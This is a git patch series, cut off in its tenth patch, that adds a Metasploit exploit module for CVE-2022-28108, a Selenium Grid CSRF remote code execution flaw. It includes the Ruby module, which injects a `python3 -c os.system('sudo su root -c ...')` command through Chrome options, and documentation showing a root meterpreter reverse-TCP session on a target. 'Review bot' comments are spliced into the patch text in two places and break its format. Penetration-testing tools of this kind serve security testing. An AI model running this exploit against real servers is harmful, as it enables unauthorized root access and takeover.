From 06af9b0b3d42550627e85a6808eae7eb3a779b08 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 26 Dec 2024 23:44:11 +0900 Subject: [PATCH 01/23] Add selenium chrome rce module --- Gemfile.lock | 8 ++ ...elenium_greed_chrome_rce_cve_2022_28108.md | 116 ++++++++++++++++++ metasploit-framework.gemspec | 3 + ...elenium_greed_chrome_rce_cve_2022_28108.rb | 102 +++++++++++++++ 4 files changed, 229 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md create mode 100644 modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb diff --git a/Gemfile.lock b/Gemfile.lock index 5174f68c4e4d..eca9eac6b202 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -95,6 +95,7 @@ PATH ruby_smb (~> 3.3.3) rubyntlm rubyzip + selenium-webdriver (~> 4.27) sinatra sqlite3 (= 1.7.3) sshkey @@ -511,6 +512,12 @@ GEM sawyer (0.9.2) addressable (>= 2.3.5) faraday (>= 0.17.3, < 3) + selenium-webdriver (4.27.0) + base64 (~> 0.2) + logger (~> 1.4) + rexml (~> 3.2, >= 3.2.5) + rubyzip (>= 1.2.2, < 3.0) + websocket (~> 1.0) simplecov (0.18.2) docile (~> 1.1) simplecov-html (~> 0.11) @@ -549,6 +556,7 @@ GEM warden (1.2.9) rack (>= 2.0.9) webrick (1.8.2) + websocket (1.2.11) websocket-driver (0.7.6) websocket-extensions (>= 0.1.0) websocket-extensions (0.1.5) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md new file mode 100644 index 000000000000..459ad879f940 --- /dev/null +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md 
@@ -0,0 +1,116 @@ +## Vulnerable Application + +Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types +such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. + +The vulnerability affects: + + * Selenium Server (Grid) before 4 + +This module was successfully tested on: + + * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.0.4 + + +### Installation + +1. docker pull selenium/standalone-chrome:3.141.59 + +2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59 + + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108` +4. Do: `run lhost= rhost=` +5. You should get a meterpreter + + +## Options + + +## Scenarios +``` +msf6 > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108 +[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > options + +Module options (exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
+ RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 4444 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + + +Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) + FETCH_DELETE false yes Attempt to delete the binary after execution + FETCH_FILENAME JCDnGOMpY no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_SRVHOST no Local IP to use for serving payload + FETCH_SRVPORT 8080 yes Local port to use for serving payload + FETCH_URIPATH no Local URI to use for serving payload + FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Linux Command + + + +View the full module info with the info, or info -d command. + +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[*] Expected error: unknown error: Chrome failed to start: exited normally. + (unknown error: DevToolsActivePort file doesn't exist) + (The process started from chrome location /usr/bin/python3 is no longer running, so ChromeDriver is assuming that Chrome has crashed.) 
+Build info: version: '3.141.59', revision: 'e82be7d358', time: '2018-11-14T08:25:53' +System info: host: 'e270e1bda998', ip: '172.17.0.2', os.name: 'Linux', os.arch: 'amd64', os.version: '6.8.0-51-generic', java.version: '1.8.0_292' +Driver info: driver.version: unknown +remote stacktrace: #0 0x5b8e0fc708f3 +#1 0x5b8e0f755ba8 +#2 0x5b8e0f778e33 +#3 0x5b8e0f7749ef +#4 0x5b8e0f7ae995 +#5 0x5b8e0f7a8d63 +#6 0x5b8e0f77f144 +#7 0x5b8e0f780135 +#8 0x5b8e0fc9fc3e +#9 0x5b8e0fcb56b7 +#10 0x5b8e0fca0b95 +#11 0x5b8e0fcb6b05 +#12 0x5b8e0fc952ab +#13 0x5b8e0fcd1248 +#14 0x5b8e0fcd13c8 +#15 0x5b8e0fcec33d +#16 0x72fc781a7609 start_thread + +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:50038) at 2024-12-26 23:30:24 +0900 + +meterpreter > getuid +Server username: root +meterpreter > sysinfo +Computer : 172.17.0.2 +OS : Ubuntu 20.04 (Linux 6.8.0-51-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index b2025223fe7c..4e3899b9ec82 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -254,6 +254,9 @@ Gem::Specification.new do |spec| # Needed to parse sections of ELF files in order to retrieve symbols spec.add_runtime_dependency 'elftools' + # Needed for Selenium + spec.add_runtime_dependency 'selenium-webdriver', '~> 4.27' + # Standard libraries: https://www.ruby-lang.org/en/news/2023/12/25/ruby-3-3-0-released/ %w[ abbrev diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb new file mode 100644 index 000000000000..424e40aacd34 --- /dev/null +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb 
@@ -0,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'selenium-webdriver'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Selenium chrome RCE',
+ 'Description' => %q{
+ Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
+ such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
+ },
+ 'Author' => [
+ 'Wiz Research', # Vulnerability research
+ 'Takahiro Yokoyama' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', 'CVE-2022-28108'],
+ ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'],
+ ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
+ ['URL', 'https://www.exploit-db.com/exploits/49915'],
+ ],
+ 'Payload' => {
+ 'DisableNops' => true
+ },
+ 'Platform' => %w[linux],
+ 'Targets' => [
+ [
+ 'Linux Command', {
+ 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+ 'FETCH_COMMAND' => 'WGET'
+ }
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2022-04-18',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE, ],
+ 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+ 'Reliability' => [ REPEATABLE_SESSION, ]
+ }
+ )
+ )
+ register_options(
+ [
+ Opt::RPORT(4444),
+ ]
+ )
+ end
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path)
+ })
+ return Exploit::CheckCode::Unknown unless res&.code == 200
+
+ json_string = res.get_html_document.xpath('//*[@class="se-version"]')&.text
+ return Exploit::CheckCode::Unknown unless json_string
+
+ # Extract the version
+ version = Rex::Version.new(json_string)
+ return Exploit::CheckCode::Unknown unless version
+
+ return Exploit::CheckCode::Safe if Rex::Version.new('4.0.1') <= version
+
+ return Exploit::CheckCode::Safe if version == Rex::Version.new('4.0.0-alpha-7')
+
+ Exploit::CheckCode::Appears
+ end
+
+ def exploit
+ remote_url = full_uri(normalize_uri(target_uri.path, 'wd/hub'))
+ # Set up Chrome options
+ chrome_options = Selenium::WebDriver::Chrome::Options.new
+ chrome_options.binary = '/usr/bin/python3'
+ sudo_payload = 'sudo su root -c "' + payload.encoded + '"'
+ chrome_options.add_argument("-cimport os; os.system('#{sudo_payload}')")
+
+ begin
+ # Initialize the driver with the remote WebDriver URL and options
+ Selenium::WebDriver.for :remote, url: remote_url, capabilities: chrome_options
+ rescue Selenium::WebDriver::Error::UnknownError => e
+ print_status("Expected error: #{e}")
+ end
+ end
+
+end
From acbcd9f3b1da9d5b13aea670bb1bf1e7edce65a4 Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Thu, 26 Dec 2024 23:51:40 +0900
Subject: [PATCH 02/23] Fix ubuntu version
---
 .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
index 459ad879f940..86eafd7e3f12 100644
--- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
@@ -9,7 +9,7 @@ The vulnerability affects:
 
 This module was successfully tested on:
 
- * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.0.4
+ * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 20.0.4
 
 
 ### Installation
From 82ebdf1f9d010172673447b65cdcd464ef849be5 Mon Sep 17 00:00:00 2001
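Review bot: In `check`, `xpath(...)&.text` yields an empty string, not nil, when no `se-version` element is present, and `""` is truthy in Ruby, so `return Exploit::CheckCode::Unknown unless json_string` never fires; the `unless version` guard two lines later is dead as well because `Rex::Version.new` never returns nil. If Rex::Version shares Gem::Version's parsing, an empty string becomes version 0, which the comparisons then report as `Appears` for any unrelated page that answers 200; `return Exploit::CheckCode::Unknown if json_string.to_s.strip.empty?` closes that gap, and the renamed `raw_version` in PATCH 07's hunk on the same file keeps the same construct. In `exploit`, only `Selenium::WebDriver::Error::UnknownError` is rescued, so a refused connection or any other WebDriver error surfaces as an unhandled exception rather than a `fail_with`. `sudo_payload` splices `payload.encoded` into a double-quoted shell string inside a Python single-quoted literal, so a cmd payload containing a quote breaks the command; PATCH 08's hunk reworks the same line and inherits the problem.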
From: Takah1ro Date: Thu, 26 Dec 2024 23:54:47 +0900 Subject: [PATCH 03/23] Improve docs --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index 86eafd7e3f12..a6f8fc64c9c6 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -14,9 +14,9 @@ This module was successfully tested on: ### Installation -1. docker pull selenium/standalone-chrome:3.141.59 +1. `docker pull selenium/standalone-chrome:3.141.59` -2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59 +2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59` ## Verification Steps From 3defb637630f3c7b1180b529066b0a1629f84e3f Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 26 Dec 2024 23:57:41 +0900 Subject: [PATCH 04/23] Fix CVE format --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 424e40aacd34..27b2734ddbc0 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb 
@@ -26,7 +26,7 @@ def initialize(info = {}) ], 'License' => MSF_LICENSE, 'References' => [ - ['CVE', 'CVE-2022-28108'], + ['CVE', '2022-28108'], ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'], ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'], ['URL', 'https://www.exploit-db.com/exploits/49915'], From 390f551df7ef1372e4c0fdef464f60f5810102c1 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 27 Dec 2024 00:10:01 +0900 Subject: [PATCH 05/23] Fix EDB --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 27b2734ddbc0..a27c3e96e011 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -29,7 +29,7 @@ def initialize(info = {}) ['CVE', '2022-28108'], ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'], ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'], - ['URL', 'https://www.exploit-db.com/exploits/49915'], + ['EDB', '49915'], ], 'Payload' => { 'DisableNops' => true From 64b183256707a7849ae73c27c55049aab20eeeeb Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 27 Dec 2024 13:00:20 +0900 Subject: [PATCH 06/23] Update not to use selenium-webdriver --- Gemfile.lock | 8 ----- ...elenium_greed_chrome_rce_cve_2022_28108.md | 29 ++-------------- metasploit-framework.gemspec | 3 -- ...elenium_greed_chrome_rce_cve_2022_28108.rb | 34 ++++++++++++------- 4 files changed, 23 insertions(+), 51 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index eca9eac6b202..5174f68c4e4d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock 
@@ -95,7 +95,6 @@ PATH ruby_smb (~> 3.3.3) rubyntlm rubyzip - selenium-webdriver (~> 4.27) sinatra sqlite3 (= 1.7.3) sshkey @@ -512,12 +511,6 @@ GEM sawyer (0.9.2) addressable (>= 2.3.5) faraday (>= 0.17.3, < 3) - selenium-webdriver (4.27.0) - base64 (~> 0.2) - logger (~> 1.4) - rexml (~> 3.2, >= 3.2.5) - rubyzip (>= 1.2.2, < 3.0) - websocket (~> 1.0) simplecov (0.18.2) docile (~> 1.1) simplecov-html (~> 0.11) @@ -556,7 +549,6 @@ GEM warden (1.2.9) rack (>= 2.0.9) webrick (1.8.2) - websocket (1.2.11) websocket-driver (0.7.6) websocket-extensions (>= 0.1.0) websocket-extensions (0.1.5) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index a6f8fc64c9c6..ed6d933cef80 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -54,7 +54,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): ---- --------------- -------- ----------- FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE false yes Attempt to delete the binary after execution - FETCH_FILENAME JCDnGOMpY no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_FILENAME BxVpVxwUH no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload 
@@ -74,35 +74,10 @@ Exploit target: View the full module info with the info, or info -d command. msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 - [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. -[*] Expected error: unknown error: Chrome failed to start: exited normally. - (unknown error: DevToolsActivePort file doesn't exist) - (The process started from chrome location /usr/bin/python3 is no longer running, so ChromeDriver is assuming that Chrome has crashed.) -Build info: version: '3.141.59', revision: 'e82be7d358', time: '2018-11-14T08:25:53' -System info: host: 'e270e1bda998', ip: '172.17.0.2', os.name: 'Linux', os.arch: 'amd64', os.version: '6.8.0-51-generic', java.version: '1.8.0_292' -Driver info: driver.version: unknown -remote stacktrace: #0 0x5b8e0fc708f3 -#1 0x5b8e0f755ba8 -#2 0x5b8e0f778e33 -#3 0x5b8e0f7749ef -#4 0x5b8e0f7ae995 -#5 0x5b8e0f7a8d63 -#6 0x5b8e0f77f144 -#7 0x5b8e0f780135 -#8 0x5b8e0fc9fc3e -#9 0x5b8e0fcb56b7 -#10 0x5b8e0fca0b95 -#11 0x5b8e0fcb6b05 -#12 0x5b8e0fc952ab -#13 0x5b8e0fcd1248 -#14 0x5b8e0fcd13c8 -#15 0x5b8e0fcec33d -#16 0x72fc781a7609 start_thread - -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:50038) at 2024-12-26 23:30:24 +0900 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60042) at 2024-12-27 12:58:15 +0900 meterpreter > getuid Server username: root diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 4e3899b9ec82..b2025223fe7c 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
@@ -254,9 +254,6 @@ Gem::Specification.new do |spec| # Needed to parse sections of ELF files in order to retrieve symbols spec.add_runtime_dependency 'elftools' - # Needed for Selenium - spec.add_runtime_dependency 'selenium-webdriver', '~> 4.27' - # Standard libraries: https://www.ruby-lang.org/en/news/2023/12/25/ruby-3-3-0-released/ %w[ abbrev diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index a27c3e96e011..5b324b1055e8 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'selenium-webdriver' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking 
@@ -84,19 +82,29 @@ def check
 end
 
 def exploit
- remote_url = full_uri(normalize_uri(target_uri.path, 'wd/hub'))
- # Set up Chrome options
- chrome_options = Selenium::WebDriver::Chrome::Options.new
- chrome_options.binary = '/usr/bin/python3'
+ url = URI.parse(full_uri(normalize_uri(target_uri.path, 'wd/hub/session')))
+
 sudo_payload = 'sudo su root -c "' + payload.encoded + '"'
- chrome_options.add_argument("-cimport os; os.system('#{sudo_payload}')")
+ # Create the request body as a Ruby hash and then convert it to JSON
+ body = {
+ 'capabilities' => {
+ 'alwaysMatch' => {
+ 'browserName' => 'chrome',
+ 'goog:chromeOptions' => {
+ 'binary' => '/usr/bin/python3',
+ 'args' => ["-cimport os; os.system('#{sudo_payload}')"]
+ }
+ }
+ }
+ }.to_json
+
+ # Set up the HTTP request
+ request = Net::HTTP::Post.new(url.path, { 'Content-Type' => 'text/plain' })
+ request.body = body
 
- begin
- # Initialize the driver with the remote WebDriver URL and options
- Selenium::WebDriver.for :remote, url: remote_url, capabilities: chrome_options
- rescue Selenium::WebDriver::Error::UnknownError => e
- print_status("Expected error: #{e}")
- end
+ # Make the HTTP request (with no-cors mode implied)
+ http = Net::HTTP.new(url.host, url.port)
+ http.request(request)
 end
 
 end
From e17d7cd161300e458b16bd9985b88afe8a6d6f6b Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Fri, 27 Dec 2024 21:50:26 +0900
Subject: [PATCH 07/23] Minor fix
---
 .../http/selenium_greed_chrome_rce_cve_2022_28108.rb | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index 5b324b1055e8..f323ddd0e571 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
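Review bot: `Net::HTTP.new(url.host, url.port)` with `http.request(request)` bypasses the module's `HttpClient` mixin, so `Proxies`, `SSL` and `VHOST` are ignored and an `https://` URI produced by `full_uri` is sent in plaintext because `use_ssl` is never enabled; `send_request_cgi` with `'method' => 'POST'`, `'headers' => { 'Content-Type' => 'text/plain' }` and `'data' => body` keeps the request on the framework's socket and honours those options. The return value of `http.request` is discarded, so a refused connection raises an unhandled `Errno` exception instead of a `fail_with`, and a rejected request is indistinguishable from an accepted one. `URI`, `Net::HTTP` and `Hash#to_json` are used without a `require` in this file once the `selenium-webdriver` require is removed; the framework may load them elsewhere, but the module should not depend on that. The comment `# Make the HTTP request (with no-cors mode implied)` refers to a browser fetch concept with no meaning for a server-side Ruby client and should be dropped.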
@@ -3,6 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +require 'net/http' +require 'uri' +require 'json' + class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -67,11 +71,11 @@ def check }) return Exploit::CheckCode::Unknown unless res&.code == 200 - json_string = res.get_html_document.xpath('//*[@class="se-version"]')&.text - return Exploit::CheckCode::Unknown unless json_string + raw_version = res.get_html_document.xpath('//*[@class="se-version"]')&.text + return Exploit::CheckCode::Unknown unless raw_version # Extract the version - version = Rex::Version.new(json_string) + version = Rex::Version.new(raw_version) return Exploit::CheckCode::Unknown unless version return Exploit::CheckCode::Safe if Rex::Version.new('4.0.1') <= version From 38e886f4b6cfa105f443268e3518cc8e016a3a7f Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 27 Dec 2024 21:58:42 +0900 Subject: [PATCH 08/23] Update payload string formatting --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index f323ddd0e571..6a6cb44cc5ed 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -88,7 +88,6 @@ def check def exploit url = URI.parse(full_uri(normalize_uri(target_uri.path, 'wd/hub/session'))) - sudo_payload = 'sudo su root -c "' + payload.encoded + '"' # Create the request body as a Ruby hash and then convert it to JSON body = { 'capabilities' => { @@ -96,7 +95,7 @@ def exploit 'browserName' => 'chrome', 'goog:chromeOptions' => { 'binary' => '/usr/bin/python3', - 'args' => ["-cimport os; os.system('#{sudo_payload}')"] + 'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"] } } } 
From e3d68d41648e27fb9f557e7f30f1b7276bf3c3dd Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 28 Dec 2024 11:18:41 +0900 Subject: [PATCH 09/23] Update author and fix version detection --- ...elenium_greed_chrome_rce_cve_2022_28108.md | 5 ++-- ...elenium_greed_chrome_rce_cve_2022_28108.rb | 25 +++++++++++-------- 2 files changed, 17 insertions(+), 13 deletions(-) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index ed6d933cef80..5bf8b097ecd6 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -54,7 +54,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): ---- --------------- -------- ----------- FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE false yes Attempt to delete the binary after execution - FETCH_FILENAME BxVpVxwUH no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_FILENAME KPrNrswF no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload 
@@ -76,8 +76,9 @@ View the full module info with the info, or info -d command. msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) +[*] Version 3.141.59 detected, which is vulnerable [+] The target appears to be vulnerable. -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60042) at 2024-12-27 12:58:15 +0900 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:58562) at 2024-12-28 11:15:06 +0900 meterpreter > getuid Server username: root diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 6a6cb44cc5ed..a0b98201a3e5 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -23,15 +23,15 @@ def initialize(info = {}) such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. }, 'Author' => [ - 'Wiz Research', # Vulnerability research - 'Takahiro Yokoyama' # Metasploit module + 'randomstuff (Gabriel Corona)', # Exploit development + 'Wiz Research', # Vulnerability research + 'Takahiro Yokoyama' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-28108'], ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'], ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'], - ['EDB', '49915'], ], 'Payload' => { 'DisableNops' => true 
@@ -71,17 +71,20 @@ def check
 })
 return Exploit::CheckCode::Unknown unless res&.code == 200
 
- raw_version = res.get_html_document.xpath('//*[@class="se-version"]')&.text
- return Exploit::CheckCode::Unknown unless raw_version
+ js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
+ return Exploit::CheckCode::Unknown unless js_code
 
- # Extract the version
- version = Rex::Version.new(raw_version)
- return Exploit::CheckCode::Unknown unless version
-
- return Exploit::CheckCode::Safe if Rex::Version.new('4.0.1') <= version
+ json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
+ json_data = JSON.parse(json_str)
+ return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version']
 
- return Exploit::CheckCode::Safe if version == Rex::Version.new('4.0.0-alpha-7')
+ # Extract the version
+ version = Rex::Version.new(json_data['version'])
+ if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
+ return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
+ end
 
+ print_status("Version #{version} detected, which is vulnerable")
 Exploit::CheckCode::Appears
 end
 
From 6c5952d3b6b5563c47657c04c2f85974cc2e5163 Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Sat, 28 Dec 2024 13:34:10 +0900
Subject: [PATCH 10/23] Use send_request_cgi
---
 ...elenium_greed_chrome_rce_cve_2022_28108.rb | 19 ++++++-------------
 1 file changed, 6 insertions(+), 13 deletions(-)
diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index a0b98201a3e5..e79745e1d997 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
